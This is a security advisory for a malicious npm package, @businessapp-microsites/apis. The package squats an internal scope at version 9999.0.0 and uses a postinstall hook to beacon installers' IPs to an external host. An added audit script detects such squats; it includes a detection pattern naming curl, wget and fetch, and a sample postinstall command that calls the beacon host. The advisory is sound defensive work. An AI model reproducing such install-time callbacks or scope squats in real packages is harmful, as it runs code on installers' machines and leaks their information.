MAL-2026-6696
Malicious code in @businessapp-microsites/apis (npm)
Details
## Source: amazon-inspector (8e03d8a4119cd5d1c143adb4fcdab1625747178082a6d56717e758b513aec4f7)

Package squats the @businessapp-microsites npm scope and is published at version 9999.0.0 to outrank any internal version during dependency resolution. The package.json declares a postinstall script that runs `node -e` to issue an HTTPS GET to poc-trustpilot-npm-1782770591.testingboxes.com with a unique per-package token in the URL path. On any `npm install` that resolves this scope from the public registry, the installer's machine performs an outbound callback that confirms execution and discloses the installer's source IP and the fact that the install occurred to a third-party host. The combination of an unregistered-scope squat, the 9999.0.0 version pin, and an install-time beacon to an external host is the canonical dependency-confusion attack pattern; researcher framing in the package metadata does not change the runtime behavior on any machine that installs it.
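The three indicators named above (internal scope served from the public registry, an implausible version pin, and an install-time hook that evaluates inline code or reaches the network) can be checked mechanically in resolved package metadata before anything is installed. The following is an added example, not code from the advisory or the package; `INTERNAL_SCOPES` and `PRIVATE_REGISTRY` are assumed placeholders for an organization's own scope list and registry, and both sample records are constructed.

```javascript
// Added example (not from the advisory): flag dependency-confusion indicators
// in a package's resolved metadata (name, version, resolved URL, scripts).
const INTERNAL_SCOPES = new Set(["@businessapp-microsites"]); // assumption: scopes that must only resolve privately
const PRIVATE_REGISTRY = "https://npm.internal.example.test/"; // assumption: placeholder private registry
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
// Inline evaluation or outbound network activity from an install hook.
const NETWORK_PATTERN = /node\s+-e|https?:\/\/|\bcurl\b|\bwget\b|\bfetch\(|https\.get/i;

function auditPackage(pkg) {
  const reasons = [];
  const scope = pkg.name.startsWith("@") ? pkg.name.split("/")[0] : null;
  // 1. Scope squat: an internal scope served by anything other than the private registry.
  if (scope && INTERNAL_SCOPES.has(scope) && !(pkg.resolved || "").startsWith(PRIVATE_REGISTRY)) {
    reasons.push(`internal scope ${scope} resolved from ${pkg.resolved || "unknown registry"}`);
  }
  // 2. Version chosen to outrank any real release during resolution.
  const major = Number.parseInt(pkg.version.split(".")[0], 10);
  if (Number.isFinite(major) && major >= 9999) {
    reasons.push(`implausible version ${pkg.version}`);
  }
  // 3. Install-phase hook that runs inline code or contacts the network.
  for (const hook of INSTALL_HOOKS) {
    const cmd = (pkg.scripts || {})[hook];
    if (cmd && NETWORK_PATTERN.test(cmd)) {
      reasons.push(`${hook} script runs inline code or a network call: ${cmd}`);
    }
  }
  return { name: pkg.name, version: pkg.version, suspicious: reasons.length > 0, reasons };
}

// Constructed sample modelled on the advisory text (not the real package contents).
const SAMPLE_SQUAT = {
  name: "@businessapp-microsites/apis",
  version: "9999.0.0",
  resolved: "https://registry.npmjs.org/@businessapp-microsites/apis/-/apis-9999.0.0.tgz",
  scripts: { postinstall: "node -e \"require('https').get('https://poc-trustpilot-npm-1782770591.testingboxes.com/<token>')\"" },
};
// Constructed benign record: same name, served from the private registry, no install hooks.
const SAMPLE_INTERNAL = {
  name: "@businessapp-microsites/apis",
  version: "1.4.2",
  resolved: "https://npm.internal.example.test/@businessapp-microsites/apis/-/apis-1.4.2.tgz",
  scripts: { test: "jest" },
};

for (const pkg of [SAMPLE_SQUAT, SAMPLE_INTERNAL]) {
  console.log(JSON.stringify(auditPackage(pkg)));
}
```

The same check can be run over every entry in a `package-lock.json` `packages` map, where `resolved` and `version` are recorded per dependency; pairing it with `ignore-scripts=true` and a scoped registry mapping in `.npmrc` removes the install-time execution path entirely.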
Affected packages
No fixed version published yet for @businessapp-microsites/apis (npm). Pin to a known-safe version or switch to an alternative.